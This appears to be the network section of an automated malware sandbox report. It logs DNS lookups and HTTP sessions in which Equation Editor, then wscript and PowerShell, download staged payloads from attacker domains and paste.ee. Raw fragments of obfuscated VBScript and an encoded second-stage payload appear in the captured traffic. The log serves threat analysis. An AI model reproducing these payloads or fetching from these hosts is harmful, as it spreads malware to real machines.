                                                                            Nov 7, 2024 16:50:53.184021950 CET192.168.2.228.8.8.80xe4d7Standard query (0)sbv.pushswroller.euA (IP address)IN (0x0001)false
                                                                            Nov 7, 2024 16:50:55.358571053 CET192.168.2.228.8.8.80x77d8Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                            Nov 7, 2024 16:50:55.385822058 CET192.168.2.228.8.8.80x3aa7Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                            Nov 7, 2024 16:51:00.374259949 CET192.168.2.228.8.8.80x113cStandard query (0)1017.filemail.comA (IP address)IN (0x0001)false
                                                                            Nov 7, 2024 16:51:00.393776894 CET192.168.2.228.8.8.80xf65dStandard query (0)1017.filemail.comA (IP address)IN (0x0001)false
                                                                            Nov 7, 2024 16:51:20.153964043 CET192.168.2.228.8.8.80x87a2Standard query (0)pus.rollerswpush.euA (IP address)IN (0x0001)false
                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Nov 7, 2024 16:50:53.200162888 CET8.8.8.8192.168.2.220xe4d7No error (0)sbv.pushswroller.eu141.98.10.88A (IP address)IN (0x0001)false
                                                                            Nov 7, 2024 16:50:55.369565964 CET8.8.8.8192.168.2.220x77d8No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                                                            Nov 7, 2024 16:50:55.369565964 CET8.8.8.8192.168.2.220x77d8No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                                                            Nov 7, 2024 16:50:55.396622896 CET8.8.8.8192.168.2.220x3aa7No error (0)paste.ee188.114.96.3A (IP address)IN (0x0001)false
                                                                            Nov 7, 2024 16:50:55.396622896 CET8.8.8.8192.168.2.220x3aa7No error (0)paste.ee188.114.97.3A (IP address)IN (0x0001)false
                                                                            Nov 7, 2024 16:51:00.381632090 CET8.8.8.8192.168.2.220x113cNo error (0)1017.filemail.comip.1017.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 7, 2024 16:51:00.381632090 CET8.8.8.8192.168.2.220x113cNo error (0)ip.1017.filemail.com142.215.209.78A (IP address)IN (0x0001)false
                                                                            Nov 7, 2024 16:51:00.409564972 CET8.8.8.8192.168.2.220xf65dNo error (0)1017.filemail.comip.1017.filemail.comCNAME (Canonical name)IN (0x0001)false
                                                                            Nov 7, 2024 16:51:00.409564972 CET8.8.8.8192.168.2.220xf65dNo error (0)ip.1017.filemail.com142.215.209.78A (IP address)IN (0x0001)false
                                                                            Nov 7, 2024 16:51:20.165888071 CET8.8.8.8192.168.2.220x87a2No error (0)pus.rollerswpush.eu141.98.10.88A (IP address)IN (0x0001)false
                                                                            • paste.ee
                                                                            • 1017.filemail.com
                                                                            • sbv.pushswroller.eu
                                                                            • pus.rollerswpush.eu
                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.2249163141.98.10.88803600C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 7, 2024 16:50:53.223331928 CET322OUTGET /tes/jukhccby.vbs HTTP/1.1
                                                                            Accept: */*
                                                                            Accept-Encoding: gzip, deflate
                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                            Host: sbv.pushswroller.eu
                                                                            Connection: Keep-Alive
                                                                            Nov 7, 2024 16:50:54.070261002 CET262INHTTP/1.1 200 OK
                                                                            etag: "341c-672c7498-a81ea;;;"
                                                                            last-modified: Thu, 07 Nov 2024 08:04:40 GMT
                                                                            content-type: application/octet-stream
                                                                            content-length: 13340
                                                                            accept-ranges: bytes
                                                                            date: Thu, 07 Nov 2024 15:50:53 GMT
                                                                            server: LiteSpeed
                                                                            connection: Keep-Alive
                                                                            Nov 7, 2024 16:50:54.070477009 CET1236INData Raw: 51 4e 75 63 43 68 4a 67 50 6d 68 49 46 4a 79 57 73 69 20 0c 20 63 72 45 61 54 65 6f 42 6a 45 63 54 28 70 63 4a 6e 45 69 48 53 46 51 50 6b 72 46 4e 45 4a 75 28 4d 52 76 74 56 4b 59 79 41 73 57 64 7a 7a 7a 4c 50 54 28 22 64 32 70 54 61 6b 4e 71 63
                                                                            Data Ascii: QNucChJgPmhIFJyWsi crEaTeoBjEcT(pcJnEiHSFQPkrFNEJu(MRvtVKYyAsWdzzzLPT("d2pTakNqcmppanBqVGouanNqSGpFakxqbGo="))).ExPandEnvIRoNmENtSTRInGs(pcJnEiHSFQPkrFNEJu(MRvtVKYyAsWdzzzLPT("JU1BTVBNUE1kTUFNVE1hTSVN"))) & pcJnEiHSFQPkrFNEJu(MRvtVKYyAsW
                                                                            Nov 7, 2024 16:50:54.070501089 CET1236INData Raw: 09 3a 20 09 09 43 61 6c 6c 20 57 6a 65 48 46 7a 41 49 58 78 50 78 57 51 66 44 48 51 28 6a 75 51 62 62 6e 6e 53 68 72 63 46 52 4c 52 51 4d 44 2c 20 51 56 53 47 59 46 44 69 74 41 53 49 65 59 54 47 75 4c 29 20 09 09 3a 20 09 09 43 61 6c 6c 20 57 6a
                                                                            Data Ascii: : Call WjeHFzAIXxPxWQfDHQ(juQbbnnShrcFRLRQMD, QVSGYFDitASIeYTGuL) : Call WjeHFzAIXxPxWQfDHQ(juQbbnnShrcFRLRQMD, ompcVhuDmTxXFurlsJ) : Call WjeHFzAIXxPxWQfDHQ(juQbbnnShrcFRLRQMD, EEhWISgaKlJAVLixey) : Call WjeHFzAIXxPxWQfDHQ(juQb
                                                                            Nov 7, 2024 16:50:54.070513964 CET1236INData Raw: 46 62 09 0b 20 3d 09 0b 20 55 62 6f 75 6e 44 28 50 61 4b 65 68 69 50 74 54 47 52 6b 4b 77 4e 47 64 48 29 20 2b 20 31 09 0b 20 3a 09 0b 20 52 45 44 49 6d 09 0b 20 50 52 45 73 45 52 76 65 09 0b 20 50 61 4b 65 68 69 50 74 54 47 52 6b 4b 77 4e 47 64
                                                                            Data Ascii: Fb = UbounD(PaKehiPtTGRkKwNGdH) + 1 : REDIm PREsERve PaKehiPtTGRkKwNGdH(IGyNGoiUPnZvDlCOFb + UBOUnD(blvyDWCDczfsEqzUit)) : fOr OsYyHjFFwuyMdBcnaG = LBOUnD(blvyDWCDczfsEqzUit) to uBOUNd(blvyDWCDczfsEqzUit) : PaKehiPtTGRkKw
                                                                            Nov 7, 2024 16:50:54.070534945 CET1236INData Raw: 30 2c 20 31 30 31 2c 20 30 2c 20 31 31 30 2c 20 30 2c 20 31 32 31 2c 20 30 2c 20 31 30 38 2c 20 30 2c 20 31 30 34 2c 20 30 2c 20 31 32 31 2c 20 30 2c 20 31 30 30 2c 20 30 2c 20 31 31 34 2c 20 30 2c 20 31 31 31 2c 20 30 2c 20 31 31 33 2c 20 30 2c
                                                                            Data Ascii: 0, 101, 0, 110, 0, 121, 0, 108, 0, 104, 0, 121, 0, 100, 0, 114, 0, 111, 0, 113, 0, 117, 0, 105, 0, 110, 0, 97, 0, 122, 0, 111, 0, 108, 0, 105, 0, 110, 0) : End Function : Function mRTyajqdTaOcdmVCbi()mRTyajqdTaOcdmVCbi = Array(97, 0,
                                                                            Nov 7, 2024 16:50:54.070552111 CET848INData Raw: 55 4b 6a 6b 20 3d 20 41 72 72 61 79 28 35 38 2c 20 30 2c 20 37 36 2c 20 30 2c 20 37 32 2c 20 30 2c 20 36 37 2c 20 30 2c 20 37 33 2c 20 30 2c 20 38 36 2c 20 30 2c 20 37 34 2c 20 30 2c 20 37 38 2c 20 30 2c 20 38 31 2c 20 30 2c 20 38 35 2c 20 30 2c
                                                                            Data Ascii: UKjk = Array(58, 0, 76, 0, 72, 0, 67, 0, 73, 0, 86, 0, 74, 0, 78, 0, 81, 0, 85, 0, 75, 0, 65, 0, 66, 0, 87, 0, 84, 0, 80, 0, 47, 0, 76, 0, 72, 0, 67, 0, 73, 0, 86, 0, 74, 0, 78, 0, 81, 0, 85, 0, 75, 0, 65, 0, 66, 0, 87, 0, 84, 0, 80, 0, 47, 0,
                                                                            Nov 7, 2024 16:50:54.070565939 CET1236INData Raw: 2c 20 30 2c 20 31 31 36 2c 20 30 2c 20 37 36 2c 20 30 2c 20 37 32 2c 20 30 2c 20 36 37 2c 20 30 2c 20 37 33 2c 20 30 2c 20 38 36 2c 20 30 2c 20 37 34 2c 20 30 2c 20 37 38 2c 20 30 2c 20 38 31 2c 20 30 2c 20 38 35 2c 20 30 2c 20 37 35 2c 20 30 2c
                                                                            Data Ascii: , 0, 116, 0, 76, 0, 72, 0, 67, 0, 73, 0, 86, 0, 74, 0, 78, 0, 81, 0, 85, 0, 75, 0, 65, 0) : End Function : Function EEhWISgaKlJAVLixey()EEhWISgaKlJAVLixey = Array(66, 0, 87, 0, 84, 0, 80, 0, 101, 0, 76, 0, 72, 0, 67, 0, 73, 0, 86, 0,
                                                                            Nov 7, 2024 16:50:54.070581913 CET1236INData Raw: 2c 20 31 31 33 2c 20 30 2c 20 37 36 2c 20 30 2c 20 37 32 2c 20 30 2c 20 36 37 2c 20 30 2c 20 37 33 2c 20 30 2c 20 38 36 2c 20 30 2c 20 37 34 2c 20 30 2c 20 37 38 2c 20 30 2c 20 38 31 2c 20 30 2c 20 38 35 2c 20 30 2c 20 37 35 2c 20 30 2c 20 36 35
                                                                            Data Ascii: , 113, 0, 76, 0, 72, 0, 67, 0, 73, 0, 86, 0, 74, 0, 78, 0, 81, 0, 85, 0, 75, 0, 65, 0, 66, 0, 87, 0, 84, 0, 80, 0, 73, 0, 76, 0, 72, 0, 67, 0, 73, 0, 86, 0, 74, 0, 78, 0, 81, 0, 85, 0, 75, 0, 65, 0) : End Function : Function OSkMVHFyaJ
                                                                            Nov 7, 2024 16:50:54.070595026 CET1236INData Raw: 20 30 29 20 09 09 3a 20 09 09 45 6e 64 20 46 75 6e 63 74 69 6f 6e 20 09 09 3a 20 09 09 46 75 6e 63 74 69 6f 6e 20 6b 4c 67 50 67 6e 5a 65 55 70 5a 56 57 4e 6b 4f 69 53 28 29 0d 0a 6b 4c 67 50 67 6e 5a 65 55 70 5a 56 57 4e 6b 4f 69 53 20 3d 20 41
                                                                            Data Ascii: 0) : End Function : Function kLgPgnZeUpZVWNkOiS()kLgPgnZeUpZVWNkOiS = Array(32, 0, 32, 0, 32, 0, 32, 0, 32, 0, 32, 0, 32, 0, 32, 0, 32, 0, 32, 0, 115, 0, 97, 0, 98, 0, 97, 0, 32, 0, 61, 0, 32, 0, 115, 0, 97, 0, 98, 0, 97, 0, 46, 0,
                                                                            Nov 7, 2024 16:50:54.070607901 CET636INData Raw: 2c 20 30 2c 20 31 31 30 2c 20 30 2c 20 31 30 35 2c 20 30 2c 20 31 30 33 2c 20 30 2c 20 31 30 39 2c 20 30 2c 20 39 37 2c 20 30 2c 20 31 31 34 2c 20 30 2c 20 34 36 2c 20 30 2c 20 31 31 35 2c 20 30 2c 20 31 30 31 2c 20 30 2c 20 31 31 30 2c 20 30 2c
                                                                            Data Ascii: , 0, 110, 0, 105, 0, 103, 0, 109, 0, 97, 0, 114, 0, 46, 0, 115, 0, 101, 0, 110, 0, 100, 0, 40, 0, 41, 0, 59, 0, 13, 0, 10, 0, 32, 0, 32, 0, 32, 0, 32, 0, 32, 0) : End Function : Function eUGNlsStPNFDidKuBM()eUGNlsStPNFDidKuBM = Array
                                                                            Nov 7, 2024 16:50:54.075596094 CET1236INData Raw: 2c 20 30 2c 20 33 32 2c 20 30 2c 20 33 32 2c 20 30 2c 20 33 32 2c 20 30 2c 20 33 32 2c 20 30 29 0d 0a 45 6e 64 20 46 75 6e 63 74 69 6f 6e 0d 0a 73 55 42 20 0c 20 51 4e 75 63 43 68 4a 67 50 6d 68 49 46 4a 79 57 73 69 28 45 4d 48 70 55 74 71 55 44
                                                                            Data Ascii: , 0, 32, 0, 32, 0, 32, 0, 32, 0)End FunctionsUB QNucChJgPmhIFJyWsi(EMHpUtqUDiLCnBLAKx, OnZhNjVGXZCMPidrOf) : dIm kpaqINrzWUufdPejGd, OxYOAjpEUPuNrUcilh, hXWjEQZoIGEKeHZtDZ, tiHCaEMySARSZBLGIL, gpkCdRPBlukmyMoZAZ, aDKRcX


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.2249164188.114.97.3803820C:\Windows\SysWOW64\wscript.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 7, 2024 16:50:55.414586067 CET173OUTGET /d/qImtr HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            Accept-Language: en-us
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: paste.ee
                                                                            Nov 7, 2024 16:50:56.179899931 CET981INHTTP/1.1 301 Moved Permanently
                                                                            Date: Thu, 07 Nov 2024 15:50:56 GMT
                                                                            Content-Type: text/html
                                                                            Transfer-Encoding: chunked
                                                                            Connection: keep-alive
                                                                            Location: https://paste.ee/d/qImtr
                                                                            cf-cache-status: DYNAMIC
                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yeloyUA3K4W08jpFNh39i%2BeO1DMOkQroq4i4SBIsIE2LB%2FZ%2Bi%2BEooBfGqNDlHzwm7yrbvXrPP9ysJn92tS0J%2FRSrpgRGMq5a29at3TBGfoZjuMDzhqyRA%2FtNAA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                            Server: cloudflare
                                                                            CF-RAY: 8dee7b57abbf2cda-DFW
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1595&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=173&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                            Data Raw: 62 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                            Data Ascii: b2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>0


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.2249167141.98.10.88804004C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Nov 7, 2024 16:51:20.171288967 CET82OUTGET /olk/SWSSL.txt HTTP/1.1
                                                                            Host: pus.rollerswpush.eu
                                                                            Connection: Keep-Alive
                                                                            Nov 7, 2024 16:51:21.058140993 CET1236INHTTP/1.1 200 OK
                                                                            etag: "43800-672bf2c7-a81e3;;;"
                                                                            last-modified: Wed, 06 Nov 2024 22:50:47 GMT
                                                                            content-type: text/plain
                                                                            content-length: 276480
                                                                            accept-ranges: bytes
                                                                            date: Thu, 07 Nov 2024 15:51:20 GMT
                                                                            server: LiteSpeed
                                                                            connection: Keep-Alive
                                                                            Data Raw: 59 64 6b 54 4a 52 45 52 42 42 31 52 4f 6c 45 52 45 46 45 55 59 68 31 52 4f 6c 45 52 45 46 45 55 48 35 55 53 45 52 55 51 51 68 46 57 48 35 55 53 45 52 55 51 51 64 6b 54 4a 52 45 52 42 42 46 57 59 64 6b 54 4a 52 45 52 42 42 31 52 4f 6c 45 52 45 46 45 55 59 68 31 52 4f 6c 45 52 45 46 45 55 48 35 55 53 45 52 55 51 51 68 46 57 48 35 55 53 45 52 55 51 51 42 6c 43 4e 34 54 65 73 4a 57 62 6c 4e 33 63 68 39 43 50 4b 30 67 43 4e 34 54 4c 74 41 43 49 4b 30 67 50 35 4e 6d 62 6c 52 6d 62 6c 42 58 5a 6b 39 43 50 67 41 69 43 4e 34 54 65 73 4a 57 62 6c 4e 33 63 42 52 6e 62 6c 52 6d 62 6c 42 58 5a 6b 39 43 50 67 41 43 49 67 6f 51 44 2b 38 43 49 67 41 43 49 67 41 43 49 67 6f 51 44 69 6f 69 49 39 55 32 5a 68 56 33 5a 75 46 47 62 67 41 43 49 67 41 43 49 67 41 43 49 67 6f 51 44 69 59 47 5a 78 59 32 59 6a 52 44 4e 78 51 6a 4e 69 56 54 4f 31 59 6a 49 39 34 57 5a 72 39 47 56 35 56 32 53 6a 6c 47 62 69 56 48 63 67 41 43 49 67 41 43 49 67 41 43 49 67 6f 51 44 69 6f 69 49 39 55 6d 63 31 52 33 59 6c 52 58 61 6f 4e 6d 63 42 4a [TRUNCATED]
                                                                            Data Ascii: YdkTJRERBB1ROlEREFEUYh1ROlEREFEUH5USERUQQhFWH5USERUQQdkTJRERBBFWYdkTJRERBB1ROlEREFEUYh1ROlEREFEUH5USERUQQhFWH5USERUQQBlCN4TesJWblN3ch9CPK0gCN4TLtACIK0gP5NmblRmblBXZk9CPgAiCN4TesJWblN3cBRnblRmblBXZk9CPgACIgoQD+8CIgACIgACIgoQDioiI9U2ZhV3ZuFGbgACIgACIgACIgoQDiYGZxY2YjRDNxQjNiVTO1YjI94WZr9GV5V2SjlGbiVHcgACIgACIgACIgoQDioiI9Umc1R3YlRXaoNmcBJ3bzNXZj9mcwBCIgACIgACIgAiCNICMuAjLw4iNi0jbvl2cyVmdgACIgACIgACIgoQDiMHbvJHdu92Qt42bt12bD5yc39GZul2VuQnZvN3byNWaNJSPl1WYuBCIgACIgACIgAiCNIiMz4Wa3JSPlBXe0BCIgACIgACIgAiCNkHdpRnblRWS5xmYtV2czFGPgACIgACIK0gP5xmYtV2czFEduVGZuVGclRGPgACIgoQD+k3YuVGZuVGclRGPgAiCN0SLhwDIgoQD+0SLgkiclRXYsBCZuFGIQhFIzd3bk5WaXhCIzd2bsFWakBCZuFGIzx2byRnbvNGIu9Wbt92YgM3dvRmbpdFIy9mZgMXZtVGa0BSZsJWYuVEIt0SI8ACIK0gCN4TLtACIK0gPu9Wa0F2YpxGcwF2L8ACIK0gPzdmbpRHdlN1c39GZul2dvwDIgACIK0gPlJXY3FUawR2L8UWdyRnPiM3ZulGd0V2Uzd3bk5WaX9SNwAjMvkUTT9SbvNmL0Z2bz9mcjlWbuMXYtVGajN3LvoDc0RHai0zcuxWb4BSZyF2dBlGckxDIgACIgAiCN4zcn5Wa0RXZTN3dvRmbpdHPgACIgoQD+IyM25SbzFmOt92YtQnZvN3byNWat1ych1WZoN
                                                                            Nov 7, 2024 16:51:21.058161020 CET1236INData Raw: 32 63 36 34 6d 63 31 4a 53 50 7a 35 47 62 74 68 48 49 75 39 57 61 30 46 32 59 70 78 47 63 77 46 47 50 67 41 69 43 4e 30 53 4c 68 77 44 49 67 6f 51 44 2b 30 53 4c 67 34 79 5a 70 5a 6d 62 76 4e 6d 4c 77 42 58 59 67 49 58 61 6c 68 47 64 67 34 57 61
                                                                            Data Ascii: 2c64mc1JSPz5GbthHIu9Wa0F2YpxGcwFGPgAiCN0SLhwDIgoQD+0SLg4yZpZmbvNmLwBXYgIXalhGdg4WagcSZ1JHdnAyb0ByZulGd0V2cgcyZulmepNXZS9Gd1FUawREanlGSz1mcvZ0c39GZul2VlxmYh5WRnASZoRHI0V2cg82csFGIgACIgACIK0AIkxWdvh2cgwyZulGd0V2cgMXaoRHIvRnbpBCdw9GI0FGa0BiNuQDIr
                                                                            Nov 7, 2024 16:51:21.058171988 CET1236INData Raw: 67 50 74 30 69 50 76 41 69 49 39 42 6a 5a 7a 51 32 4d 6c 56 57 5a 6b 68 44 4d 77 30 53 5a 6d 56 54 59 74 55 7a 59 7a 51 54 4c 32 51 54 4e 78 30 79 4e 31 51 54 4d 78 41 6a 4d 6c 74 6e 49 39 51 57 53 67 4d 31 54 6b 56 47 64 79 39 47 63 77 56 33 63
                                                                            Data Ascii: gPt0iPvAiI9BjZzQ2MlVWZkhDMw0SZmVTYtUzYzQTL2QTNx0yN1QTMxAjMltnI9QWSgM1TkVGdy9GcwV3c80SLhwDIgACIgAiCN4TLtASY0NXaWByc39GZul2Vg0SLhwDIgACIgAiCNoQD+0SLg4CduVWbu9mcpZnblBSZsJWa0FGct92YgQ3cv1GIlhGdgQWZ0NWZsV2cgkHbsF2YpRXYt9Gd1FGIgACIgACIgACIgoQDgwGbp
                                                                            Nov 7, 2024 16:51:21.058187008 CET1236INData Raw: 57 64 67 49 69 63 76 52 58 59 79 52 33 63 70 35 57 61 74 52 57 51 6c 4a 58 61 31 46 58 5a 79 4a 53 50 73 56 6d 64 6c 78 47 49 67 77 57 5a 32 56 47 54 75 39 57 61 30 56 33 59 6c 68 58 52 6b 56 47 64 7a 56 57 64 78 56 6d 63 38 41 43 49 67 41 43 49
                                                                            Data Ascii: WdgIicvRXYyR3cp5WatRWQlJXa1FXZyJSPsVmdlxGIgwWZ2VGTu9Wa0V3YlhXRkVGdzVWdxVmc8ACIgACIgACIK0gPvAiIlNHbhZmI9M3clN2YBlWdgIiclt2b25WSzFmI9wWZ2VGbgACblZXZM52bpRXdjVGeFRWZ0NXZ1FXZyxDIgACIgACIgoQDK0gLn5Wa39Gbs9mZgUGa0BiZvBSZu9GIoRXa3BSZk9mbgwWZ2VGTu9Wa0
                                                                            Nov 7, 2024 16:51:21.058197975 CET1236INData Raw: 51 41 41 6f 43 41 41 41 51 4d 41 49 44 41 77 41 67 4d 41 41 43 41 67 41 51 71 41 41 43 41 30 42 41 61 41 63 47 41 70 42 67 63 41 6b 48 41 77 42 77 62 41 4d 45 41 41 41 41 64 41 67 47 41 6e 42 51 61 41 49 48 41 35 42 41 63 41 38 47 41 44 42 41 62
                                                                            Data Ascii: QAAoCAAAQMAIDAwAgMAACAgAQqAACA0BAaAcGApBgcAkHAwBwbAMEAAAAdAgGAnBQaAIHA5BAcA8GADBAbAEGAnBQZAwEABAgEAgEAAAQZAgHAlBgLAEGAsBAbAUGApBgcAIGA1BQQAAAAlBQbAEGAOBAbAEGAuBgcAUGA0BgbAkEABAgDAwDAAAAMA4CAwAgLAADAuAQMAAAAAAgbA8GApBwcAIHAlBgVAUGAsBQaAYEABAACA
                                                                            Nov 7, 2024 16:51:21.058206081 CET1236INData Raw: 4a 54 43 51 72 68 70 6e 47 4c 54 54 4d 42 68 79 70 75 57 78 4f 6c 69 57 53 4e 2b 68 77 4e 30 6a 30 50 47 73 78 4c 46 76 5a 6f 38 41 36 31 71 46 61 54 38 72 4f 6b 72 6b 75 6f 68 46 7a 75 53 51 4f 77 74 5a 57 30 52 75 76 6d 2b 39 67 58 75 41 55 45
                                                                            Data Ascii: JTCQrhpnGLTTMBhypuWxOliWSN+hwN0j0PGsxLFvZo8A61qFaT8rOkrkuohFzuSQOwtZW0Ruvm+9gXuAUEpaq8VHSL7dPV4gmHSIwlSX98g6Qnrqqh/2jS5dEygqRSgr+1jNeuduK+kMYnVmk277NHGw3dlVc1TTItX2r2FotBY9fKwLkSfMFq2eGWZz+xRDymBg1JKBXbQfNMYfGThewHIJFFoPkFyYBRhNSL+LHBx8T87Szic
                                                                            Nov 7, 2024 16:51:21.058218956 CET1236INData Raw: 51 64 4c 4e 59 4d 75 34 6c 58 67 61 4c 49 4c 2f 38 61 66 55 65 37 56 6a 70 76 4a 42 39 6b 65 53 43 78 4d 52 66 79 6c 70 68 30 4e 76 52 76 33 35 68 76 73 35 42 61 39 70 37 35 46 4c 6e 36 4f 61 39 44 49 70 4c 4d 6f 2f 71 63 74 6a 2f 6b 76 68 78 74
                                                                            Data Ascii: QdLNYMu4lXgaLIL/8afUe7VjpvJB9keSCxMRfylph0NvRv35hvs5Ba9p75FLn6Oa9DIpLMo/qctj/kvhxtNj5jRsjYXr1460woFM+ftPQHBaIWNQeVR+nQgSQt/293eZDGe/guP7QGFkNySPNisb9dLnb5stzgvmueGyflpiGxNJYjgMgVzUlPRFEswozLW/UrjOSzcpk9dNpoJ8ZCM7Y1xkAC8fV1WITOHh6JF9PZt2Wn9xFl7
                                                                            Nov 7, 2024 16:51:21.058255911 CET1236INData Raw: 5a 63 78 76 45 7a 55 71 51 6b 6f 52 4a 30 43 43 44 6a 46 7a 6c 38 67 50 7a 79 71 77 58 4d 69 54 6a 77 67 51 31 74 33 76 38 64 4d 46 78 46 50 36 61 33 76 30 79 33 59 44 63 36 2b 6c 32 56 4e 57 67 69 4a 57 6e 61 34 41 4a 63 30 76 57 6c 4a 33 36 4d
                                                                            Data Ascii: ZcxvEzUqQkoRJ0CCDjFzl8gPzyqwXMiTjwgQ1t3v8dMFxFP6a3v0y3YDc6+l2VNWgiJWna4AJc0vWlJ36MhumUWqMZratij7q9NCpiam4ANA57EKRSOdksIpYcSPRsLGPhBZV4tat+Ua8tes3EGPH6b0NQ3Ep/+ct56gUe4ksN29LmPS/ilu2A2e62snd7iem4WK+LrHx7niS9C69V+VW/i/B/9BT6Stw5WCO53zWJiDJwg/W9Y
                                                                            Nov 7, 2024 16:51:21.058268070 CET1236INData Raw: 2b 2b 6b 33 57 62 4e 4d 73 76 75 77 66 46 66 2f 5a 76 54 66 70 79 49 39 51 6c 30 35 30 66 53 32 61 75 6d 56 51 33 4c 44 66 5a 69 77 56 62 65 32 30 31 7a 2b 39 4e 54 71 39 52 31 63 2b 6e 5a 52 4e 36 78 56 52 73 32 7a 6c 34 58 70 4c 65 41 51 6c 34
                                                                            Data Ascii: ++k3WbNMsvuwfFf/ZvTfpyI9Ql050fS2aumVQ3LDfZiwVbe201z+9NTq9R1c+nZRN6xVRs2zl4XpLeAQl4FVDHE3K6R2p4+jrZZaJ3Cl+FtHZ52v265nTqo1ajedaqmLztONxMFLxsyaZe4XdkDewfshR2vfSrZbT6W002yLM1nPeZrF8poLP5aMSKL9VDoEKUb8w8/M9TkiF7kqmAXmDOczhZNvip0kLtcCY/Zr9dZn9181a8Q
                                                                            Nov 7, 2024 16:51:21.058278084 CET1236INData Raw: 66 6f 6a 65 58 35 47 79 61 39 74 65 45 45 65 4a 2b 43 70 4f 4e 61 6e 4a 78 2b 5a 36 77 57 51 51 54 30 6a 41 67 6b 5a 66 6e 4c 2f 45 4a 77 77 4a 69 73 48 5a 6e 6e 72 48 49 39 37 38 4f 56 51 37 48 68 6d 6f 51 30 64 32 35 77 76 37 4d 30 37 37 78 79
                                                                            Data Ascii: fojeX5Gya9teEEeJ+CpONanJx+Z6wWQQT0jAgkZfnL/EJwwJisHZnnrHI978OVQ7HhmoQ0d25wv7M077xybb8EkklBQO5j528fpa4mWZUr7vU0xdTmrTPpV77Efv+doLniZKkYnK+/fEQDNBOe4ZDkkvQU0X0M0/hqUPtTlyv4JiU7M0Usb0WWIToFsaiGBELxLc1r0/dbPWVFjQAG5zmGfmprV3f5SUNAWpUtOsOLfMr7lMqxE
                                                                            Nov 7, 2024 16:51:21.063158989 CET922INData Raw: 44 72 39 79 4f 77 56 46 72 4f 44 77 50 31 49 2f 32 59 61 53 42 30 52 59 44 77 57 44 39 63 70 2b 59 4e 50 41 49 56 5a 46 58 5a 2b 72 65 59 75 32 53 6b 4b 4c 73 75 31 4f 62 63 33 47 2b 74 35 72 43 68 32 72 36 4f 30 37 76 37 30 66 62 6e 42 45 6f 58
                                                                            Data Ascii: Dr9yOwVFrODwP1I/2YaSB0RYDwWD9cp+YNPAIVZFXZ+reYu2SkKLsu1Obc3G+t5rCh2r6O07v70fbnBEoXuJIIga9TzfvCVQlfSOV6I1bOZv+bc87dPw3Zmes6AJ+751B9G7eJS6QedUFOfKIIMm0T5rz6hwuEEKcwBttB0sUHCSUmSubeKlGK5BIZSeLJrorA7S9dBEuhtcvfs2WrrFpePE2MPHpWquZZOH02B/QKVIaZSOgwo


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.2249165188.114.97.34433820C:\Windows\SysWOW64\wscript.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-11-07 15:50:56 UTC173OUTGET /d/qImtr HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept: */*
                                                                            Accept-Language: en-us
                                                                            User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                            Host: paste.ee
                                                                            2024-11-07 15:50:57 UTC1232INHTTP/1.1 200 OK
                                                                            Date: Thu, 07 Nov 2024 15:50:57 GMT
                                                                            Content-Type: text/plain; charset=utf-8
                                                                            Transfer-Encoding: chunked
                                                                            Connection: close
                                                                            Cache-Control: max-age=2592000
                                                                            strict-transport-security: max-age=63072000
                                                                            x-frame-options: DENY
                                                                            x-content-type-options: nosniff
                                                                            x-xss-protection: 1; mode=block
